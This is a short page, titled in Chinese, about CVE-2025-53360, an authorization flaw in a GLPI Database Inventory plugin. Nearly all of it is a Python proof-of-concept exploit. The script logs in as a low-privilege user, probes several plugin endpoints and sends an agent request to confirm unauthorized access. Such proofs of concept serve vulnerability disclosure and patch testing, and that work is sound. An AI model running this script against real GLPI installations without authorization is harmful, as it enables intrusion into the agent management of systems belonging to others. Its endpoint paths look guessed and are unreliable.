CVE-2025-53360: GLPI数据库清单插件权限控制缺陷导致未授权访问

import requests import sys # CVE-2025-53360 PoC - pluginsGLPI Database Inventory Plugin Unauthorized Agent Access # Target: pluginsGLPI with Database Inventory Plugin < 1.0.3 def exploit_cve_2025_53360(target_url, username, password): """ This PoC demonstrates the authentication bypass vulnerability in pluginsGLPI Database Inventory Plugin. Any authenticated user can send requests to agents without proper authorization checks. """ session = requests.Session() # Step 1: Login to GLPI with low-privilege user login_url = f"{target_url}/front/login.php" login_data = { 'username': username, 'password': password, 'auth': 'local', 'submit': 'Login' } try: response = session.post(login_url, data=login_data, timeout=10) if 'GLPI' not in response.text and response.status_code != 200: print("[-] Login failed") return False print("[+] Successfully authenticated as low-privilege user") # Step 2: Access agent management endpoint (unauthorized) # This should be restricted but isn't in vulnerable versions agent_endpoints = [ '/ajax/plugin.databaseinventory.php', '/front/plugin.databaseinventory.agent.php', '/api/plugin/databaseinventory/agent/' ] for endpoint in agent_endpoints: url = f"{target_url}{endpoint}" try: response = session.get(url, timeout=10) # Check if we can access agent data without proper permissions if response.status_code == 200: print(f"[+] Successfully accessed {endpoint}") print(f"[+] Response indicates unauthorized access possible") print(f"[+] Status Code: {response.status_code}") except requests.RequestException as e: print(f"[-] Request to {endpoint} failed: {e}") # Step 3: Send malicious request to agent malicious_url = f"{target_url}/ajax/plugin.databaseinventory.php" payload = { 'action': 'getAgentStatus', 'agent_id': '1' } response = session.post(malicious_url, data=payload, timeout=10) if response.status_code == 200: print("[+] Malicious request accepted by vulnerable endpoint") print("[+] Vulnerability confirmed - unauthorized agent access possible") return True except requests.RequestException as e: print(f"[-] Error: {e}") return False if __name__ == '__main__': if len(sys.argv) != 4: print(f"Usage: python {sys.argv[0]} <target_url> <username> <password>") print(f"Example: python {sys.argv[0]} http://localhost/glpi user pass") sys.exit(1) target = sys.argv[1] user = sys.argv[2] passwd = sys.argv[3] print("[*] CVE-2025-53360 PoC - pluginsGLPI Database Inventory Plugin") print("[*] Vulnerability: Improper Authorization in Agent Management") print("-" * 60) exploit_cve_2025_53360(target, user, passwd)